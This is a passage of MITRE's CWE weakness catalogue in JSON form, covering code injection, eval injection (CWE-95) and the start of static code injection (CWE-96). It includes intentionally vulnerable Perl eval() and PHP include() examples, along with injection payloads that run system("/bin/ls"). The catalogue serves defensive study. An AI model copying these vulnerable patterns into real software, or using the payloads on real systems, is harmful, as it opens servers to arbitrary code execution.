situation."]},{"attr":{"@_Demonstrative_Example_ID":"DX-31"},"Intro_Text":"edit-config.pl: This CGI script is used to modify settings in a configuration file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"use CGI qw(:standard);sub config_file_add_key {}sub config_file_set_key {}sub config_file_delete_key {}sub handleConfigAction {}$configfile = \\"/home/cwe/config.txt\\";print header;if (defined(param(\'action\'))) {}else {}","xhtml:br":["","","","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to add a field/key to a file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to set key to a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to delete key from a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $action) = @_;my $key = param(\'key\');my $val = param(\'val\');my $code = \\"config_file_$action_key(\\\\$fname, \\\\$key, \\\\$val);\\";eval($code);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["# this is super-efficient code, especially if you have to invoke","# any one of dozens of different functions!"]}},{"#text":"handleConfigAction($configfile, param(\'action\'));","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"No action specified!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"add_key(\\",\\",\\"); system(\\"/bin/ls\\");"},{"attr":{"@_Nature":"result"},"xhtml:div":"config_file_add_key(\\",\\",\\"); system(\\"/bin/ls\\");"}],"Body_Text":["The script intends to take the \'action\' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as:","This would produce the following string in handleConfigAction():","Any arbitrary Perl code could be added after the attacker has \\"closed off\\" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker\'s payload is activated. This particular manipulation would fail after the system() call, because the \\"_key(\\\\$fname, \\\\$key, \\\\$val)\\" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5071","Description":"Eval injection in PHP program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5071"},{"Reference":"CVE-2002-1750","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750"},{"Reference":"CVE-2008-5305","Description":"Eval injection in Perl program using an ID that should only contain hyphens and numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305"},{"Reference":"CVE-2002-1752","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1752"},{"Reference":"CVE-2002-1753","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1753"},{"Reference":"CVE-2005-1527","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1527"},{"Reference":"CVE-2005-2837","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2837"},{"Reference":"CVE-2005-1921","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921"},{"Reference":"CVE-2005-2498","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2498"},{"Reference":"CVE-2005-3302","Description":"Code injection into Python eval statement from a field in a formatted file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3302"},{"Reference":"CVE-2007-1253","Description":"Eval injection in Python program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253"},{"Reference":"CVE-2001-1471","Description":"chain: Resultant eval injection. An invalid value prevents initialization of variables, which can be modified by attacker and later injected into PHP eval statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471"},{"Reference":"CVE-2002-0495","Description":"Perl code directly injected into CGI library file from parameters to another CGI program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0495"},{"Reference":"CVE-2005-1876","Description":"Direct PHP code injection into supporting template file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1876"},{"Reference":"CVE-2005-1894","Description":"Direct code injection into PHP script that can be accessed by attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1894"},{"Reference":"CVE-2003-0395","Description":"PHP code from User-Agent HTTP header directly inserted into log file implemented as PHP script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0395"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_ID":"CODE","Entry_Name":"Code Evaluation and Injection"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"242"}},{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"77"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 3: Web-Client Related Vulnerabilities (XSS).&#34; Page 63"}}},"Notes":{"Note":{"#text":"Many of these weaknesses are under-studied and under-researched, and terminology is not sufficiently precise.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Code Injection","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Control Generation of Code (aka \'Code Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Control Generation of Code (\'Code Injection\')","attr":{"@_Date":"2011-03-29"}}]}},"95":{"attr":{"@_ID":"95","@_Name":"Improper Neutralization of Directives in Dynamically Evaluated Code (\'Eval Injection\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. \\"eval\\").","Extended_Description":"This may allow an attacker to execute arbitrary code, or at least modify what code can be executed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"94","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Ruby","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"The injected code could access restricted data / files."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Injected code can access resources that the attacker is directly prevented from accessing."},{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":"Execute Unauthorized Code or Commands","Note":"Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"If possible, refactor your code so that it does not need to use eval() at all."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.","Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-31"},"Intro_Text":"edit-config.pl: This CGI script is used to modify settings in a configuration file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"use CGI qw(:standard);sub config_file_add_key {}sub config_file_set_key {}sub config_file_delete_key {}sub handleConfigAction {}$configfile = \\"/home/cwe/config.txt\\";print header;if (defined(param(\'action\'))) {}else {}","xhtml:br":["","","","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to add a field/key to a file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to set key to a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to delete key from a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $action) = @_;my $key = param(\'key\');my $val = param(\'val\');my $code = \\"config_file_$action_key(\\\\$fname, \\\\$key, \\\\$val);\\";eval($code);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["# this is super-efficient code, especially if you have to invoke","# any one of dozens of different functions!"]}},{"#text":"handleConfigAction($configfile, param(\'action\'));","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"No action specified!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"add_key(\\",\\",\\"); system(\\"/bin/ls\\");"},{"attr":{"@_Nature":"result"},"xhtml:div":"config_file_add_key(\\",\\",\\"); system(\\"/bin/ls\\");"}],"Body_Text":["The script intends to take the \'action\' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as:","This would produce the following string in handleConfigAction():","Any arbitrary Perl code could be added after the attacker has \\"closed off\\" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker\'s payload is activated. This particular manipulation would fail after the system() call, because the \\"_key(\\\\$fname, \\\\$key, \\\\$val)\\" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5071","Description":"Eval injection in PHP program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5071"},{"Reference":"CVE-2002-1750","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750"},{"Reference":"CVE-2008-5305","Description":"Eval injection in Perl program using an ID that should only contain hyphens and numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305"},{"Reference":"CVE-2002-1752","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1752"},{"Reference":"CVE-2002-1753","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1753"},{"Reference":"CVE-2005-1527","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1527"},{"Reference":"CVE-2005-2837","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2837"},{"Reference":"CVE-2005-1921","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921"},{"Reference":"CVE-2005-2498","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2498"},{"Reference":"CVE-2005-3302","Description":"Code injection into Python eval statement from a field in a formatted file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3302"},{"Reference":"CVE-2007-1253","Description":"Eval injection in Python program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253"},{"Reference":"CVE-2001-1471","Description":"chain: Resultant eval injection. An invalid value prevents initialization of variables, which can be modified by attacker and later injected into PHP eval statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471"},{"Reference":"CVE-2007-2713","Description":"Chain: Execution after redirect triggers eval injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Direct Dynamic Code Evaluation (\'Eval Injection\')"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS35-PL","Entry_Name":"Do not invoke the eval form with a string argument","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"35"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 18, &#34;Inline Evaluation&#34;, Page 1095"}}},"Notes":{"Note":[{"#text":"Factors: special character errors can play a role in increasing the variety of code that can be injected, although some vulnerabilities do not require special characters at all, e.g. when a single function without arguments can be referenced and a terminator character is not necessary.","attr":{"@_Type":"Other"}},{"#text":"This issue is probably under-reported. Most relevant CVEs have been for Perl and PHP, but eval injection applies to most interpreted languages. Javascript eval injection is likely to be heavily under-reported.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Observed_Examples, Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Description, Name, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Direct Dynamic Code Evaluation (\'Eval Injection\')","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Directives in Dynamically Evaluated Code (aka \'Eval Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Directives in Dynamically Evaluated Code (\'Eval Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"96":{"attr":{"@_ID":"96","@_Name":"Improper Neutralization of Directives in Statically Saved Code (\'Static Code Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"94","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This issue is most frequently found in PHP applications that allow users to set configuration variables that are stored within executable PHP files. Technically, this could also be performed in some compiled code (e.g. by byte-patching an executable), although it is highly unlikely."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"The injected code could access restricted data / files."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Injected code can access resources that the attacker is directly prevented from accessing."},{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":"Execute Unauthorized Code or Commands","Note":"Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Strategy":"Output Encoding","Description":"Perform proper output validation and escaping to neutralize all code syntax from data written to code files."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-32"},"Intro_Text":"This example attempts to write user messages to a message file and allow users to view them.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$MessageFile = \\"messages.out\\";if ($_GET[\\"action\\"] == \\"NewMessage\\") {}else if ($_GET[\\"action\\"] == \\"ViewMessages\\") {}","xhtml:br":["",""],"xhtml:div":[{"#text":"$name = $_GET[\\"name\\"];$message = $_GET[\\"message\\"];$handle = fopen($MessageFile, \\"a+\\");fwrite($handle, \\"&lt;b&gt;$name&lt;/b&gt; says \'$message\'&lt;hr&gt;\\\\n\\");fclose($handle);echo \\"Message Saved!&lt;p&gt;\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"include($MessageFile);","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"name=h4x0rmessage=%3C?php%20system(%22/bin/ls%20-l%22);?%3E","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"&lt;?php system(\\"/bin/ls -l\\");?&gt;"}],"Body_Text":["While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as:","which will decode to the following:","The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages.","Notice that XSS (CWE-79) is also possible in this situation."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0495","Description":"Perl code directly injected into CGI library file from parameters to another CGI program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0495"},{"Reference":"CVE-2005-1876","Description":"Direct PHP code injection into supporting template file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1876"},{"Reference":"CVE-2005-1894","Description":"Direct code injection into PHP script that can be accessed by attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1894"},{"Reference":"CVE-2003-0395","Description":"PHP code from User-Agent HTTP header directly inserted into log file implemented as PHP script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0395"},{"Reference":"CVE-2007-6652","Description":"chain: execution after redirect allows non-administrator to perform static code injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6652"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Direct Static Code Injection"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"77"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"85"}}]},"Notes":{"Note":{"#text":"\\"HTML injection\\" (see CWE-79: XSS) could be thought of as an example of this, but the code is injected and executed on the client side, not the server side. Server-Side Includes (SSI) are an example of direct static code injection.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content 